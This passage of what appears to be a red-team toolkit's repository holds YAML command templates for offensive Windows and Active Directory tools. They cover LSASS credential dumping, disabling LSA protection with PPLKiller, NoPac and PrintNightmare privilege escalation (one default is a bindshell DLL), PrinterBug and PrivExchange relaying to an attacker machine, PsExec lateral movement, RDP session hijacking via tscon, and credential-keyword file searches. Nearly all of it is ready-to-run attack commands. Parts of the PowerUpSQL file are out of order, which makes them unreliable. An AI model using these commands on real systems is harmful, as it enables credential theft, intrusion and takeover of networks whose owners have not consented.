Creds] 123 | mitre: '' 124 | verb: '' 125 | required_flags: [Fork, DumpPath] 126 | optional_flags: [] 127 | - name: Leak an LSASS handle in a notepad process, get access to LSASS via handle duplicate, then read it indirectly by creating a fork. 
128 | labels: [LSASS, Creds] 129 | mitre: 'T1003.001' 130 | verb: '' 131 | required_flags: [SeclogonLeakRemote, Fork, Valid] 132 | optional_flags: [DumpPath] 133 | - name: Get a handle with seclogon leak local, read LSASS indirectly by using a fork. Write the dump with a valid signature 134 | labels: [LSASS, Creds] 135 | mitre: 'T1003.001' 136 | verb: '' 137 | required_flags: [SeclogonLeakLocal, Fork, Valid, DumpPath] 138 | optional_flags: [] 139 | - name: Duplicate an existing handle and write the dump to disk with an invalid signature (restore the signature before parsing the dump). 140 | labels: [LSASS, Creds] 141 | mitre: 'T1003.001' 142 | verb: '' 143 | required_flags: [Duplicate, DumpPath] 144 | optional_flags: [] 145 | - name: Trick seclogon to open a handle to LSASS and duplicate it. 146 | labels: [LSASS, Creds] 147 | mitre: 'T1003.001' 148 | verb: '' 149 | required_flags: [SeclogonDuplicate] 150 | optional_flags: [DumpPath] 151 | - name: Open a handle to LSASS with a spoofed callstack. 152 | labels: [LSASS, Creds] 153 | mitre: 'T1003.001' 154 | verb: '' 155 | required_flags: [SpoofCallstack] 156 | optional_flags: [DumpPath] 157 | - name: Make the WerFault.exe process create a full memory dump in the Temp folder. 158 | labels: [LSASS, Creds] 159 | mitre: 'T1003.001' 160 | verb: '' 161 | required_flags: [SilentProcessExit] 162 | optional_flags: [] 163 | - name: Use the Shtinkering technique (WerFault). 164 | labels: [LSASS, Creds] 165 | mitre: 'T1003.001' 166 | verb: '' 167 | required_flags: [Shtinkering] 168 | optional_flags: [] 169 | - name: Obtain a handle using seclogon leak local and create the dump using the Shtinkering technique. 170 | labels: [LSASS, Creds] 171 | mitre: 'T1003.001' 172 | verb: '' 173 | required_flags: [SeclogonLeakLocal, Shtinkering] 174 | optional_flags: [] 175 | - name: Obtain a handle with low privs using a spoofed callstack and elevate it. 176 | labels: [LSASS, Creds] 177 | mitre: 'T1003.001' 178 | verb: '' 179 | required_flags: [EelevateHandle, SpoofCallstack] 180 | optional_flags: [] 181 | - name: Duplicate an existing low priv handle and elevate it. 
182 | labels: [LSASS, Creds] 183 | mitre: 'T1003.001' 184 | verb: '' 185 | required_flags: [DuplicateLow] 186 | optional_flags: [] 187 | - name: Get the Process ID of LSASS.exe. 188 | labels: [LSASS, Creds] 189 | mitre: '' 190 | verb: '' 191 | required_flags: [GetPid] 192 | optional_flags: [] -------------------------------------------------------------------------------- /commands/NoPac.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/cube0x0/noPac 3 | name: NoPac 4 | languages: 5 | - name: EXE 6 | prefix: NoPac.exe 7 | 8 | params: 9 | - name: Domain 10 | type: text 11 | description: Domain name 12 | template: "-domain {0}" 13 | default: example.local 14 | optional: false 15 | - name: Username 16 | type: text 17 | description: Username 18 | template: "-user {0}" 19 | default: User1 20 | optional: false 21 | - name: Password 22 | type: text 23 | description: Password 24 | template: "-pass {0}" 25 | default: Password123 26 | optional: false 27 | - name: DomainController 28 | type: text 29 | description: Domain controller 30 | template: "/dc {0}" 31 | default: 32 | optional: true 33 | - name: mAccount 34 | type: text 35 | description: New computer account to create (it persists in AD until removed, so clean it up after the engagement) 36 | template: "/mAccount {0}" 37 | default: NoPacTest 38 | optional: true 39 | - name: mPassword 40 | type: text 41 | description: New computer account password 42 | template: "/mPassword {0}" 43 | default: P@ssw0rd 44 | optional: true 45 | - name: Service 46 | type: text 47 | description: Service class of the service ticket to request (e.g. cifs, ldap) 48 | template: "/service {0}" 49 | default: cifs 50 | optional: true 51 | 52 | - name: Flags 53 | type: label 54 | 55 | - name: PTT 56 | type: flag 57 | description: Pass-The-Ticket (inject the obtained ticket into the current session) 58 | value: /ptt 59 | optional: true 60 | selected: false 61 | 62 | sections: 63 | - name: Self crafted command 64 | labels: ["PrivEsc", "AD", "Impersonation"] 65 | mitre: '' 66 | verb: '' 67 | required_flags: [Domain, Username, Password] 68 | 
optional_flags: [DomainController, mAccount, mPassword, Service, PTT] 69 | 70 | - name: Execute NoPac 71 | labels: ["PrivEsc", "AD", "Impersonation"] 72 | mitre: '' 73 | verb: '' 74 | required_flags: [Domain, Username, Password, DomainController, mAccount, mPassword, Service] 75 | optional_flags: [PTT] 76 | 77 | - name: Check ticket size (~500 bytes means the DC is likely unpatched and vulnerable) 78 | labels: ["PrivEsc", "AD", "Impersonation"] 79 | mitre: '' 80 | verb: 'scan' 81 | required_flags: [Domain, Username, Password] 82 | optional_flags: [] -------------------------------------------------------------------------------- /commands/PPLDump.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/itm4n/PPLdump 3 | name: PPLDump 4 | languages: 5 | - name: EXE 6 | prefix: 'PPLdump.exe' 7 | 8 | params: 9 | - name: ProcessName 10 | type: text 11 | description: Name of the protected (PPL) process to dump, e.g. lsass (use either the name or the PID) 12 | template: "{0}" 13 | default: '' 14 | optional: true 15 | 16 | - name: ProcessID 17 | type: text 18 | description: PID of the protected (PPL) process to dump (use either the name or the PID) 19 | template: "{0}" 20 | default: '' 21 | optional: true 22 | 23 | - name: DumpFile 24 | type: text 25 | description: Path of the output dump file 26 | template: "{0}" 27 | default: 'C:\temp\out' 28 | optional: true 29 | 30 | - name: Verbose 31 | type: flag 32 | description: Verbose output 33 | value: '-v' 34 | optional: true 35 | selected: false 36 | 37 | - name: DebugMode 38 | type: flag 39 | description: Enable Debug mode 40 | value: '-d' 41 | optional: true 42 | selected: false 43 | 44 | - name: Force 45 | type: flag 46 | description: Bypass DefineDosDevice error check 47 | value: '-f' 48 | optional: true 49 | selected: false 50 | 51 | sections: 52 | - name: Dump PPL process memory (requires local admin; relies on the DefineDosDevice technique, reportedly fixed on up-to-date Windows builds) 53 | labels: [LSASS, Creds] 54 | mitre: 'T1003.001' 55 | verb: '' 56 | required_flags: [DumpFile] 57 | optional_flags: [ProcessName, ProcessID, Verbose, DebugMode, Force] 58 | 
-------------------------------------------------------------------------------- /commands/PPLKiller.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/RedCursorSecurityConsulting/PPLKiller 3 | name: PPLKiller 4 | params: 5 | - name: Command 6 | description: description 7 | 8 | sections: 9 | - name: Installing PPLKiller Driver 10 | labels: ["Lateral", "Creds", "Protection Bypassing"] 11 | commands: 12 | - language: EXE 13 | command: PPLKiller.exe /installDriver 14 | 15 | - name: Disabling PPL 16 | labels: ["Lateral", "Creds", "Protection Bypassing"] 17 | commands: 18 | - language: EXE 19 | command: PPLKiller.exe /disableLSAProtection 20 | 21 | - name: Uninstalling PPLKiller Driver (cleanup) 22 | labels: ["Lateral", "Creds", "Protection Bypassing"] 23 | commands: 24 | - language: EXE 25 | command: PPLKiller.exe /uninstallDriver 26 | -------------------------------------------------------------------------------- /commands/PingCastle.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://www.pingcastle.com/ 3 | name: PingCastle 4 | languages: 5 | - name: EXE 6 | prefix: PingCastle.exe 7 | 8 | params: 9 | - name: DomainController 10 | type: text 11 | description: Specify Domain Controller to execute check against 12 | template: "--server {0}" 13 | default: 14 | optional: false 15 | - name: PcScanner 16 | description: The scanner to use 17 | default: aclcheck 18 | template: "--scanner {0}" 19 | type: select 20 | options: 21 | [ 22 | "aclcheck", 23 | "antivirus", 24 | "computerversion", 25 | "foreignusers", 26 | "laps_bitlocker", 27 | "localadmin", 28 | "nullsession", 29 | "nullsession-trust", 30 | "oxidbindings", 31 | "remote", 32 | "share", 33 | "smb", 34 | "smb3querynetwork", 35 | "spooler", 36 | "startup", 37 | "zerologon", 38 | ] 39 | optional: false 40 | - name: Username 41 | type: text 42 | description: Username to use 
for PingCastle scan 43 | template: "--user {0}" 44 | default: User1 45 | optional: false 46 | - name: Password 47 | type: text 48 | description: Password to use for PingCastle scan (passed on the command line, so it will appear in process creation logs) 49 | template: "--password {0}" 50 | default: Password123 51 | optional: false 52 | 53 | - name: Flags 54 | type: label 55 | 56 | - name: HealthCheck 57 | type: flag 58 | description: Run the health check (domain risk assessment) 59 | value: --healthcheck 60 | optional: true 61 | selected: false 62 | - name: DateFile 63 | type: flag 64 | description: Include the date in the report file name 65 | value: --datefile 66 | optional: true 67 | selected: false 68 | - name: NoEnumLimit 69 | type: flag 70 | description: Remove the limit on the number of enumerated objects 71 | value: --no-enum-limit 72 | optional: true 73 | selected: false 74 | - name: Reachable 75 | type: flag 76 | description: Add reachable domains to the list of domains to analyse 77 | value: --reachable 78 | optional: true 79 | selected: false 80 | - name: ExploreTrust 81 | type: flag 82 | description: Also analyse domains reachable through trusts 83 | value: --explore-trust 84 | optional: true 85 | selected: false 86 | - name: ExploreForestTrust 87 | type: flag 88 | description: Also analyse domains reachable through forest trusts 89 | value: --explore-forest-trust 90 | optional: true 91 | selected: false 92 | 93 | sections: 94 | - name: Execute PingCastle HealthCheck against all domains in forest 95 | labels: ["Recon", "AD"] 96 | mitre: 'T1590.001' 97 | verb: '' 98 | required_flags: [HealthCheck, DomainController] 99 | optional_flags: [DateFile, NoEnumLimit, Reachable, ExploreTrust, ExploreForestTrust, Username, Password] 100 | 101 | - name: Execute PingCastle Specific scanner with specific credentials 102 | labels: ["Recon", "AD", "Creds"] 103 | mitre: 'T1590.001' 104 | verb: '' 105 | required_flags: [PcScanner, Username, Password] 106 | optional_flags: [] 107 | 108 | # --- 109 | 110 | # sections: 111 | # - name: Execute PingCastle HealthCheck against all domains in forest 112 | # labels: ["Recon", "AD"] 113 | # mitre: 'T1590.001' 114 | # commands: 115 | # - language: EXE 116 | # command: PingCastle.exe --healthcheck --server * 117 | # - name: Execute PingCastle thorough HealthCheck against all domains in forest 118 | # labels: ["Recon", "AD"] 119 | # mitre: 
'T1590.001' 120 | # commands: 121 | # - language: EXE 122 | # command: PingCastle.exe --healthcheck --server * --level Full --datefile --no-enum-limit --reachable --explore-trust --explore-forest-trust 123 | # - name: Execute PingCastle thorough HealthCheck against all domains in forest with specific credentials 124 | # labels: ["Recon", "AD"] 125 | # mitre: 'T1590.001' 126 | # commands: 127 | # - language: EXE 128 | # command: PingCastle.exe --healthcheck --server * --level Full --datefile --no-enum-limit --reachable --explore-trust --explore-forest-trust --user {{Username}} --password {{Password}} 129 | # - name: Execute PingCastle HealthCheck against specific DC 130 | # labels: ["Recon", "AD"] 131 | # mitre: 'T1590.001' 132 | # commands: 133 | # - language: EXE 134 | # command: PingCastle.exe --healthcheck --server {{DomainController}} 135 | # - name: Execute PingCastle Specific scanner 136 | # labels: ["Recon", "AD"] 137 | # mitre: 'T1590.001' 138 | # commands: 139 | # - language: EXE 140 | # command: PingCastle.exe --scanner {{PcScanner}} 141 | # - name: Execute PingCastle Specific scanner with specific credentials 142 | # labels: ["Recon", "AD", "Creds"] 143 | # mitre: 'T1590.001' 144 | # commands: 145 | # - language: EXE 146 | # command: PingCastle.exe --scanner {{PcScanner}} --user {{Username}} --password {{Password}} -------------------------------------------------------------------------------- /commands/PowerUpSQL.yaml: -------------------------------------------------------------------------------- 1 | projectLink: https://github.com/NetSPI/PowerUpSQL 2 | name: PowerUpSQL 3 | languages: 4 | - name: PS 5 | prefix: '' 6 | 7 | params: 8 | - name: Target 9 | type: label 10 | 11 | - name: Instance 12 | type: text 13 | description: The SQL server instance 14 | template: "-Instance {0}" 15 | default: MSSQLSRV04\SOMESQL 16 | optional: true 17 | 18 | - name: IPAddress 19 | type: text 20 | description: IP Address of SQL Server 21 | template: "-IPAddress {0}" 22 
| default: '10.0.0.1' 23 | optional: true 24 | 25 | - name: IPRange 26 | type: text 27 | description: IP Address Range In CIDR Format to Audit 28 | template: "-IPRange {0}" 29 | default: '10.0.0.1/24' 30 | optional: true 31 | 32 | - name: ComputerName 33 | type: text 34 | description: Specific hostname to interact with 35 | template: "-ComputerName {0}" 36 | default: '' 37 | optional: true 38 | 39 | - name: FilePath 40 | type: text 41 | description: Load SQL targets from a file 42 | template: "-FilePath {0}" 43 | default: 'c:\temp\computers.txt' 44 | optional: true 45 | 46 | - name: Authentication 47 | type: label 48 | 49 | - name: Username 50 | type: text 51 | description: SQL Server or domain account to authenticate with 52 | template: "-Username {0}" 53 | default: '' 54 | optional: true 55 | 56 | - name: Password 57 | type: text 58 | description: SQL Server or domain account password to authenticate with (passed on the command line; prefer -Credential where possible) 59 | template: "-Password {0}" 60 | default: '' 61 | optional: true 62 | 63 | - name: Credential 64 | type: text 65 | description: A [System.Management.Automation.PSCredential] object to authenticate with 66 | template: "-Credential {0}" 67 | default: 68 | optional: true 69 | 70 | - name: WorkstationId 71 | type: text 72 | description: Spoof the name of the workstation/hostname you're connecting to the server with 73 | template: "-WorkstationId {0}" 74 | default: 'dc01' 75 | optional: true 76 | 77 | - name: Execution 78 | type: label 79 | 80 | - name: Query 81 | type: text 82 | description: Query to be executed on the SQL Server 83 | template: "-Query {0}" 84 | default: '"Select @@version"' 85 | optional: true 86 | 87 | - name: Database 88 | type: text 89 | description: Database to connect to 90 | template: "-Database {0}" 91 | default: '' 92 | optional: true 93 | 94 | - name: Command 95 | type: text 96 | description: Operating system command to be executed on the SQL Server 97 | template: "-Command {0}" 98 | default: 'whoami' 99 | optional: true 100 | 101 | - name: Exploit 102 | type: flag 103 | description: Exploit identified audit issues (makes changes on the target, not read-only) 104 | value: '-Exploit' 105 | optional: true 106 | selected: false 107 | 108 | - name: Filter 
102 | type: label 103 | 104 | - name: DatabaseName 105 | type: text 106 | description: Database name filter 107 | template: "-DatabaseName {0}" 108 | default: '' 109 | optional: true 110 | 111 | - name: TableName 112 | type: text 113 | description: Table name filter 114 | template: "-TableName {0}" 115 | default: '' 116 | optional: true 117 | 118 | - name: ColumnName 119 | type: text 120 | description: Column name filter 121 | template: "-ColumnName {0}" 122 | default: '' 123 | optional: true 124 | 125 | - name: ColumnNameSearch 126 | type: text 127 | description: Column name filter that support wildcards 128 | template: "-ColumnNameSearch {0}" 129 | default: 'passwords' 130 | optional: true 131 | 132 | - name: NoDefaults 133 | type: flag 134 | description: Don't list anything from default databases 135 | value: '-NoDefaults' 136 | optional: true 137 | selected: false 138 | 139 | - name: Options 140 | type: label 141 | 142 | - name: OutFolder 143 | type: text 144 | description: Output folder to store SQL audit results (csv) 145 | template: "-OutFolder {0}" 146 | default: 'OUTPUT' 147 | optional: true 148 | 149 | - name: Threads 150 | type: text 151 | description: Number of concurrent threads 152 | template: "-Threads {0}" 153 | default: '5' 154 | optional: true 155 | 156 | - name: Timeout 157 | type: text 158 | description: Connection timeout 159 | template: "-Timeout {0}" 160 | default: 1 161 | optional: true 162 | 163 | - name: Verbose 164 | type: flag 165 | description: Enable console verbosity 166 | value: '-Verbose' 167 | optional: true 168 | selected: false 169 | 170 | - name: Encrypt 171 | type: flag 172 | description: Use an encrypted connection 173 | value: '-Encrypt' 174 | optional: true 175 | selected: false 176 | 177 | - name: DAC 178 | type: flag 179 | description: Connect using Dedicated Admin Connection 180 | value: '-DAC' 181 | optional: true 182 | selected: false 183 | 184 | - name: RawResults 185 | type: flag 186 | description: Just show the raw 
results of an execution without the computer or instance name 187 | value: '-RawResults' 188 | optional: true 189 | selected: false 190 | 191 | - name: HasAccess 192 | type: flag 193 | description: Only select databases the current user has access to 194 | value: '-HasAccess' 195 | optional: true 196 | selected: false 197 | 198 | - name: SysAdminOnly 199 | type: flag 200 | description: Only select databases owned by a sysadmin 201 | value: '-SysAdminOnly' 202 | optional: true 203 | selected: false 204 | 205 | - name: NoOutput 206 | type: flag 207 | description: Don't output anything 208 | value: '-NoOutput' 209 | optional: true 210 | selected: false 211 | 212 | 213 | 214 | sections: 215 | 216 | - name: Discover Active Directory's SQL Server instances (via MSSQL service principal names) 217 | labels: [Recon,SQL] 218 | mitre: '' 219 | verb: 'Get-SQLInstanceDomain' 220 | required_flags: [] 221 | optional_flags: [Verbose,SysAdminOnly] 222 | 223 | - name: Discover Remote SQL Instances via UDP scan 224 | labels: [Recon,SQL] 225 | mitre: '' 226 | verb: 'Get-SQLInstanceScanUDPThreaded' 227 | required_flags: [ComputerName] 228 | optional_flags: [IPAddress,IPRange,Verbose] 229 | 230 | - name: Get server info from a specified instance 231 | labels: [Recon,SQL] 232 | mitre: '' 233 | verb: 'Get-SQLServerInfo' 234 | required_flags: [Instance] 235 | optional_flags: [Username,Password,Credential,Verbose] 236 | 237 | - name: Test authentication to SQL instance (Uses current user if credentials are not supplied) 238 | labels: [Recon,SQL] 239 | mitre: '' 240 | verb: 'Get-SQLConnectionTestThreaded' 241 | required_flags: [Instance] 242 | optional_flags: [IPAddress,IPRange,Database,Username,Password,Credential,Threads,Verbose,Timeout,DAC,HasAccess] 243 | 244 | - name: Execute a query on target SQL servers 245 | labels: [Recon,SQL] 246 | mitre: '' 247 | verb: 'Get-SQLQuery' 248 | required_flags: [Instance, Query] 249 | optional_flags: [Username,Password,Credential,Database,Verbose,Timeout,DAC,Threads,WorkstationId,Encrypt] 
250 | 251 | - name: Audit for high impact weak configurations by running all privilege escalation checks 252 | labels: [PrivEsc] 253 | mitre: '' 254 | verb: 'Invoke-SQLAudit' 255 | required_flags: [Instance] 256 | optional_flags: [Username,Password,Credential,Exploit,OutFolder,NoOutput] 257 | 258 | - name: Execute OS commands - xp_cmdshell 259 | labels: [Lateral] 260 | mitre: 'T1505.001' 261 | verb: 'Invoke-SQLOSCmd' 262 | required_flags: [Instance,Command] 263 | optional_flags: [Username,Password,Credential,Verbose] 264 | 265 | - name: Execute OS commands - CLR 266 | labels: [Lateral] 267 | mitre: 'T1505.001' 268 | verb: 'Invoke-SQLOSCLR' 269 | required_flags: [Instance,Command] 270 | optional_flags: [Username,Password,Credential,Verbose] 271 | 272 | - name: Crawl database links 273 | labels: [Recon] 274 | mitre: '' 275 | verb: 'Get-SqlServerLinkCrawl' 276 | required_flags: [Instance] 277 | optional_flags: [Username,Password,Credential,Verbose] 278 | 279 | - name: Dump an inventory of common objects to csv in the current directory 280 | labels: [Recon] 281 | mitre: '' 282 | verb: 'Invoke-SQLDumpInfo' 283 | required_flags: [Instance] 284 | optional_flags: [Username,Password,Credential,OutFolder,Verbose] -------------------------------------------------------------------------------- /commands/PowerView.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/PowerShellMafia/PowerSploit 3 | params: 4 | - name: Domain 5 | description: Name of the domain to enumerate. 6 | default: example.local 7 | - name: Forest 8 | description: Name of the forest to enumerate. 
9 | default: example.local 10 | 11 | sections: 12 | - name: Find users with an SPN set (Kerberoasting candidates) 13 | labels: ["Recon"] 14 | commands: 15 | - language: PS 16 | command: Get-NetUser -SPN 17 | 18 | - name: Domain trusts for the current domain 19 | labels: ["Recon"] 20 | mitre: '' 21 | commands: 22 | - language: PS 23 | command: |- 24 | Get-NetDomainTrust 25 | Get-NetDomainTrust -Domain {{Domain}} 26 | 27 | - name: Details about the current forest 28 | labels: ["Recon"] 29 | mitre: '' 30 | commands: 31 | - language: PS 32 | command: |- 33 | Get-NetForest 34 | Get-NetForest -Forest {{Forest}} -------------------------------------------------------------------------------- /commands/PrinterBug.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dirkjanm/krbrelayx 3 | name: PrinterBug 4 | params: 5 | - name: Domain 6 | description: Domain 7 | - name: Username 8 | description: Any authenticated domain user (low privilege is sufficient) 9 | - name: Password 10 | description: Password 11 | - name: AttackerMachine 12 | description: Attacker machine running ntlmrelayx (the target's machine account will authenticate to it) 13 | - name: Target 14 | description: Target with the Print Spooler service running 15 | 16 | sections: 17 | - name: Execute spooler exploit to trigger computer account smb authentication 18 | labels: ["Lateral", "CVE", "Relaying"] 19 | commands: 20 | - language: PY 21 | command: printerbug.py {{Domain}}/{{Username}}:{{Password}}@{{Target}} {{AttackerMachine}} 22 | -------------------------------------------------------------------------------- /commands/PrinterNightmareLPE.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/calebstewart/CVE-2021-1675 3 | name: PrinterNightmareLPE 4 | languages: 5 | - name: PS 6 | prefix: Invoke-Nightmare 7 | 8 | params: 9 | - name: DriverName 10 | type: text 11 | description: Name of driver that will be installed 12 | template: "-DriverName \"{0}\"" 13 | default: Xerox 14 | optional: true 15 | - 
name: NewUser 16 | type: text 17 | description: Name of the new local administrator that will be created 18 | template: "-NewUser \"{0}\"" 19 | default: john 20 | optional: true 21 | - name: NewPassword 22 | type: text 23 | description: Password of the new local administrator 24 | template: "-NewPassword \"{0}\"" 25 | default: SuperSecure 26 | optional: true 27 | - name: DLL 28 | type: text 29 | description: Absolute local path of the DLL that the spooler will load (executed as SYSTEM) 30 | template: "-DLL \"{0}\"" 31 | default: C:\absolute\path\to\your\bindshell.dll 32 | optional: true 33 | 34 | sections: 35 | - name: Self crafted 36 | labels: ["PrivEsc", "Driver", "CVE"] 37 | mitre: '' 38 | verb: '' 39 | required_flags: [] 40 | optional_flags: [DriverName, NewUser, NewPassword, DLL] 41 | - name: Add a new user to the local administrators group by default 42 | labels: ["PrivEsc", "Driver", "CVE"] 43 | mitre: '' 44 | verb: '' 45 | required_flags: [DriverName, NewUser, NewPassword] 46 | optional_flags: [] 47 | - name: Supply a custom DLL payload, to do anything else you might like 48 | labels: ["PrivEsc", "Driver", "CVE"] 49 | mitre: '' 50 | verb: '' 51 | required_flags: [DLL] 52 | optional_flags: [] -------------------------------------------------------------------------------- /commands/PrivExchange.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dirkjanm/PrivExchange 3 | name: PrivExchange 4 | params: 5 | - name: Domain 6 | description: Domain 7 | - name: Username 8 | description: Username with mailbox 9 | - name: Password 10 | description: Password of username 11 | - name: AttackerMachine 12 | description: Attacker machine with ntlmrelayx 13 | - name: Target 14 | description: Exchange (OWA/EWS) server name 15 | 16 | sections: 17 | - name: Trigger Exchange HTTP Authentication 18 | labels: ["Lateral", "CVE", "Relaying"] 19 | commands: 20 | - language: PY 21 | command: privexchange.py -d {{Domain}} -u {{Username}} -p {{Password}} -ah {{AttackerMachine}} {{Target}} 22 | 
-------------------------------------------------------------------------------- /commands/PsExec.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 3 | name: PsExec 4 | languages: 5 | - name: EXE 6 | prefix: psexec 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: computer 14 | type: text 15 | description: Execute an application on the remote computer or computers specified (comma separated). If you omit the computer name, PsExec runs the application on the local system 16 | template: "\\\\{0}" 17 | default: 'victim.domain.local' 18 | optional: false 19 | 20 | - name: fileinput 21 | type: text 22 | description: PsExec will execute the command on each of the computers listed in the file 23 | template: "@{0}" 24 | default: 25 | optional: true 26 | selected: false 27 | 28 | - name: Authentication 29 | type: label 30 | 31 | - name: username 32 | type: text 33 | description: Specifies optional user name for login to remote computer 34 | template: "-u {0}" 35 | default: 36 | optional: true 37 | selected: false 38 | 39 | - name: password 40 | type: text 41 | description: 'Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password (preferable: a password on the command line is recorded in process creation logs)' 42 | template: "-p {0}" 43 | default: 44 | optional: true 45 | selected: false 46 | 47 | - name: File Operation 48 | type: label 49 | 50 | - name: copy 51 | type: text 52 | description: Copy the specified executable to the remote system for execution. 
If you omit this option the application must be in the system path on the remote system 53 | template: "-c {0}" 54 | default: 'mal.exe' 55 | optional: false 56 | 57 | - name: force-copy 58 | type: flag 59 | description: Copy the specified program even if the file already exists on the remote system 60 | value: '-f' 61 | optional: true 62 | selected: false 63 | 64 | - name: Execution 65 | type: label 66 | 67 | - name: application 68 | type: text 69 | description: Name of application to execute 70 | template: "\"{0}\"" 71 | default: 'c:\windows\system32\cmd.exe' 72 | optional: false 73 | 74 | - name: arguments 75 | type: text 76 | description: Arguments to pass (note that file paths must be absolute paths on the target system) 77 | template: "{0}" 78 | default: '' 79 | optional: true 80 | selected: false 81 | 82 | - name: working-dir 83 | type: text 84 | description: Set the working directory of the process (relative to remote computer) 85 | template: "-w {0}" 86 | default: '' 87 | optional: true 88 | selected: false 89 | 90 | - name: service-name 91 | type: text 92 | description: Specifies the name of the remote service to create or interact with 93 | template: "-r {0}" 94 | default: 95 | optional: true 96 | selected: false 97 | 98 | - name: Timeouts 99 | type: label 100 | 101 | - name: timeout 102 | type: text 103 | description: Specifies timeout in seconds connecting to remote computers 104 | template: "-n {0}" 105 | default: '5' 106 | optional: true 107 | selected: false 108 | 109 | - name: Flags 110 | type: label 111 | 112 | - name: system 113 | type: flag 114 | description: Run the remote process in the System account. 115 | value: '-s' 116 | optional: true 117 | selected: false 118 | 119 | - name: interactive 120 | type: flag 121 | description: 'Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. 
This flag is required when attempting to run console applications interactively' 122 | value: '-i' 123 | optional: true 124 | selected: false 125 | 126 | - name: accepteula 127 | type: flag 128 | description: Suppress the display of the license dialog 129 | value: '-accepteula' 130 | optional: true 131 | selected: false 132 | 133 | - name: nowait 134 | type: flag 135 | description: Don't wait for process to terminate (non-interactive). 136 | value: -d 137 | optional: true 138 | selected: false 139 | 140 | - name: lowpriv 141 | type: flag 142 | description: Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group) 143 | value: '-l' 144 | optional: true 145 | selected: false 146 | 147 | sections: 148 | - name: Launch interactive command prompt on a remote computer, optionally specifying username and password to authenticate 149 | labels: [Lateral] 150 | mitre: 'T1569.002' 151 | verb: '' 152 | required_flags: [interactive, computer, application] 153 | optional_flags: [username, password, nowait, system, lowpriv, accepteula, working-dir] 154 | 155 | - name: Copy local program to the remote system and execute it interactively, optionally specify application arguments 156 | labels: [Lateral] 157 | mitre: 'T1569.002' 158 | verb: '' 159 | required_flags: [interactive, computer, copy] 160 | optional_flags: [arguments, force-copy, username, password, nowait, working-dir, accepteula] 161 | 162 | - name: Run local application interactively with the System account privileges 163 | labels: [PrivEsc] 164 | mitre: '' 165 | verb: '' 166 | required_flags: [interactive, nowait, system, application] 167 | optional_flags: [arguments, accepteula] -------------------------------------------------------------------------------- /commands/RDPHijack.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | name: RDPHijack 4 | params: 5 | - name: ServiceName 6 | 
description: name of the temporary service that will be created (delete it afterwards) 7 | - name: TargetSessionNumber 8 | description: the ID of the session to hijack (see `query user`) 9 | - name: CurrentRDPSessionNumber 10 | description: the ID of the current RDP session 11 | 12 | sections: 13 | - name: Hijack RDP Session (run tscon as SYSTEM through a service; requires local admin) 14 | labels: ['Lateral', 'Creds'] 15 | commands: 16 | - language: EXE 17 | command: |- 18 | sc.exe create {{ServiceName}} binpath= "cmd.exe /k tscon {{TargetSessionNumber}} /dest:rdp-tcp#{{CurrentRDPSessionNumber}}" 19 | net start {{ServiceName}} 20 | sc.exe delete {{ServiceName}} 21 | -------------------------------------------------------------------------------- /commands/SQL.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | params: 3 | - name: Table 4 | description: Table name 5 | sections: 6 | - name: Query specific table 7 | labels: [] 8 | commands: 9 | - language: EXE 10 | command: select * from {{Table}} 11 | -------------------------------------------------------------------------------- /commands/SauronEye.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/vivami/SauronEye 3 | name: SauronEye 4 | languages: 5 | - name: EXE 6 | prefix: SauronEye.exe 7 | 8 | params: 9 | - name: directories 10 | type: text 11 | description: Directories to search 12 | template: "--directories {0}" 13 | default: 'C:\ "\\SOME NETWORK DRIVE\C$"' 14 | optional: false 15 | - name: filetypes 16 | type: text 17 | description: File types to search 18 | template: "--FileTypes {0}" 19 | default: ".txt .bat .docx .conf" 20 | optional: true 21 | - name: keywords 22 | type: text 23 | description: Keywords to search for 24 | template: "--keywords {0}" 25 | default: "*pass* user creds secret key AKIA ASIA" 26 | optional: true 27 | - name: maxfilesize 28 | type: text 29 | description: Max file size to search contents in, in kilobytes 30 | template: "--maxfilesize {0}" 31 | default: 5000000 32 | 
optional: true 33 | - name: BeforeDate 34 | type: text 35 | description: "Filter files last modified before this date, format: yyyy-MM-dd" 36 | template: "--BeforeDate {0}" 37 | default: "2020-07-23" 38 | optional: true 39 | - name: AfterDate 40 | type: text 41 | description: "Filter files last modified after this date, format: yyyy-MM-dd" 42 | template: "--AfterDate {0}" 43 | default: "2020-07-23" 44 | optional: true 45 | - name: contents 46 | type: flag 47 | description: Also search inside file contents for the keywords (not only file names) 48 | value: "--contents" 49 | optional: true 50 | selected: false 51 | 52 | sections: 53 | - name: Self crafted command 54 | labels: ["Recon"] 55 | mitre: 'T1083' 56 | verb: '' 57 | required_flags: [directories] 58 | optional_flags: [filetypes, keywords, contents, maxfilesize, BeforeDate, AfterDate] 59 | 60 | - name: Search files by suffix 61 | labels: ["Recon"] 62 | mitre: "T1083" 63 | verb: '' 64 | required_flags: ["directories", "filetypes"] 65 | optional_flags: [] 66 | 67 | 68 | - name: Search files by suffix and keywords 69 | labels: ["Recon"] 70 | mitre: "T1083" 71 | verb: '' 72 | required_flags: ["directories", "filetypes", "keywords"] 73 | optional_flags: [] 74 | 75 | 76 | - name: Search files by suffix and keywords whose modification date is after a specific date 77 | labels: ["Recon"] 78 | mitre: "T1083" 79 | verb: '' 80 | required_flags: ["directories", "filetypes", "keywords", "AfterDate"] 81 | optional_flags: [] 82 | 83 | 84 | - name: Search files by suffix and keywords whose modification date is before a specific date 85 | labels: ["Recon"] 86 | mitre: "T1083" 87 | verb: '' 88 | required_flags: ["directories", "filetypes", "keywords", "BeforeDate"] 89 | optional_flags: [] 90 | 91 | 92 | - name: Search the contents of files with the provided suffix for 